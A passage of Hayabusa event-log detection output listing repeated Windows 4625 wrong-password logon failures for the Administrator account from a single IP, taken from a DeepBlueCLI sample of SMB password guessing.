NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: 